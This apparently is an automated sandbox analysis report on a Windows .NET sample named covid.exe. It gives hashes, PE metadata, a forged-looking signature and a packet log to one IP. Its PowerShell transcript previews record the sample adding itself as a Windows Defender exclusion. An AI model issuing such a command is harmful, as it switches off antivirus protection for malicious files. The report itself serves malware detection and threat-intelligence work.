                                                                Encrypted:false
                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfokoedf.q1p.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smbn3d1y.f3r.psm1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tym2jct4.dby.psm1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xz5qrnxd.rfa.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.YAHSjSYP.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.361307632295367
                                                                Encrypted:false
                                                                SSDEEP:96:BZ4x6qZN4dqDo1ZObCZ+6qZN4dqDo1ZZMyOyUyjZH6qZN4dqDo1ZuJyEyEyNZ+:sl6
                                                                MD5:B4B02164A6FA467E0AE696445D0B6B26
                                                                SHA1:513BEE9D426B22C7CADAB0C99DFCC402B808D470
                                                                SHA-256:3A0D47EEE921355FB29411527205FA13A7A7B7C40D4849007FB54EE75AAA9EF8
                                                                SHA-512:4993411E98C6724182B2EE4C222E867DA2642A06619B7F4C2E7BC0721CC9BE5EDB6DC9B6E1EACC62AB58C2F4DE5F5BAA7F02544E919E2D7B1F627479E7B3A56C
                                                                Malicious:false
                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230005..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230005..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230526..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.kuWr1X7Z.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.359309757879457
                                                                Encrypted:false
                                                                SSDEEP:96:BZp6qZN4z3qDo1ZVCZO6qZN4z3qDo1ZWMyOyUyjZS6qZN4z3qDo1ZqJyEyEykZ2:4s+x
                                                                MD5:21CE8E1B82258946100644140B7013C5
                                                                SHA1:619FF53A089FA62422ABC029F72C14667F6D749F
                                                                SHA-256:C38AF2408E89FDF430986EC182AFEA49CD22E63B23649D142256895FC1EA7188
                                                                SHA-512:9B37B7B06EC5E9FD029B56FE9214AFA38A208E312A8F78E6465D2B25010E1602CD82AEB022F7F8655F0385EBF8661643C4E22F2C9042247B525DE8FF58C41721
                                                                Malicious:false
                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230002..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230002..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230320..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2679790
                                                                Entropy (8bit):3.071546356466385
                                                                Encrypted:false
                                                                SSDEEP:12288:HOgjCfV50UYJ9zyVM8f92Ev+EZBQth8tCFiAdA9JW21OgjCfV50UYJ9zyVM8f92T:HdNYRXv6iT1dNYRXv6iTS
                                                                MD5:1F6602BC19F05B583F8EC310007B038B
                                                                SHA1:F7DC5C858BEBD19F80EF0969308758283D4B5B56
                                                                SHA-256:85709EC49736BD005624D4B542222DAAE924D277AD468B21FF2775674CEEE5CA
                                                                SHA-512:69D60D9F5BFA84BA3664B6E135739A5FE3F52C2F5F0C7FF88B4A2198CE8C257251B5EA74514460CA24E46098BA0136AE9F7330E7522849B2A749CBF6FBC34356
                                                                Malicious:false
                                                                Preview: SS Of yQQ f F f f f Q f f f exx exx f f yCQ f f f f f f f wQ f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f yeC f f f yQ Fy yCw yQ f yCf O efx FF yCQ y Sw efx FF CQ yfQ yfx yyx Fe yye yyQ yyy yfF yyQ OS yfO Fe OO OS yyf yyf yyy yyw Fe OC yfy Fe yyQ yyS yyf Fe yfx yyf Fe wC SO CF Fe yfO yyy yff yfy Qw yF yF yf Fw f f f f f f f Cf wO f f Sw y F f OS yFC yxC eew f f f f f f f f eeQ f FQ f yy y Cf f f we C f f w f f f f f f eFC OF C f f Fe f f f Ow C f f f f yw f Fe f f f e f f Q f f f f f f f w f f f f f f f f ywf C f f e f f f f f f e f Ow yFF f f yw f f yw f f f f yw f f yw f f f f f f yw f f f f f f f f f f f yxe OF C f CF f f f f Ow C f CC F f f f f f f f f f f f f f f f f f f f yeC C f ye f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f Fe f f C f f f f f f f f f f f C Fe f f Se f f f f f f f f f f f Qw yyw yfy yef yyw f f f eQQ wy C f f Fe f f f we C f f e f f f f f f f f f f f f f f Fe f f Ow Qw yyQ yyx y

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.605387718409897
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:covid.exe
                                                                File size:39624
                                                                MD5:99e3b458dee79b33209d39d19692ae08
                                                                SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
                                                                SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
                                                                SHA512:79c087ff41871e03523feee4eee606f27bc59c5213c259df713f1fc0bc860b7846757136ce8b9a9755210aa38192c813eb87131afcaa18c5dec0b5d70060a3a4
                                                                SSDEEP:384:6pJWGVGYxA5sJ8wCo9GTqsm3bdioR+BA8Z/itiB6j4lsTgR8engVEWfNpi/wOpzA:0LX9XbdM56wWoyey/Vcrpti6lhMx
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@............."...0..|............... ........@.. ...............................'....@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x409ace
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 4/19/2021 9:43:47 AM 4/19/2022 9:43:47 AM
                                                                Subject Chain
                                                                • C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Version:3
                                                                Thumbprint MD5:05B1F24EB4299E74171523A6BAE99247
                                                                Thumbprint SHA-1:9220EF39055DD6D18D9B7A41230CEAA4F76B5358
                                                                Thumbprint SHA-256:41523B79D33BAD1F3D99CB31EEABD79B3B6F28E870E01800A08B4C5B36B5FEEF
                                                                Serial:00B8BEE23D8FB88CA889DAD9E6D2F8C69D

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9a780x53.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x588.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x86000x14c8.text
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x7ad40x7c00False0.413904989919data5.18958268075IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xa0000x5880x600False0.412109375data4.00563976551IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_VERSION0xa0a00x2fcdata
                                                                RT_MANIFEST0xa39c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightCopyright 2021
                                                                Assembly Version1.0.0.0
                                                                InternalNameahmed.exe
                                                                FileVersion1.0.0.0
                                                                CompanyName
                                                                LegalTrademarks
                                                                Comments
                                                                ProductNameahmed
                                                                ProductVersion1.0.0.0
                                                                FileDescriptionahmed
                                                                OriginalFilenameahmed.exe

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 20, 2021 22:59:11.631361008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.684120893 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.684290886 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.684930086 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.737579107 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937634945 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937678099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937705040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937730074 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937752008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937766075 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.937773943 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937797070 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937799931 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.937844992 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.198029995 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198069096 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198093891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198117971 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198215961 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.199172974 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.199203968 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.199322939 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.200407982 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.200443983 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.200520039 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.201627970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.201658010 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.201726913 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.202872038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.202903032 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.202970028 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.204102993 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.204137087 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.204205036 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.205338955 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.205370903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.205456018 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.206574917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.206608057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.206665993 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.207807064 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.207839012 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.207930088 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.209031105 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.209063053 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.209140062 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.210285902 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.210319996 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.210378885 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.211505890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.211539030 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.211630106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.212704897 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.212738037 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.212824106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.213963985 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.213995934 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.214071989 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.215200901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.215233088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.215316057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.216418028 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.216451883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.216502905 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.217673063 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.217705011 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.217761993 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.218903065 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251354933 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251394033 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251491070 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.251885891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251910925 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251960039 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.253123045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.253155947 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.253201008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.254389048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254422903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254458904 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.255589008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255621910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255660057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.256850004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256885052 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256927013 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.258069992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258120060 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258141994 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.259304047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259340048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259386063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.260538101 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260572910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260629892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.261760950 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261797905 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261840105 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.263015985 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.263092041 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.263585091 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.263617039 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.263689995 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.264803886 CEST8049702172.67.220.147192.168.2.7
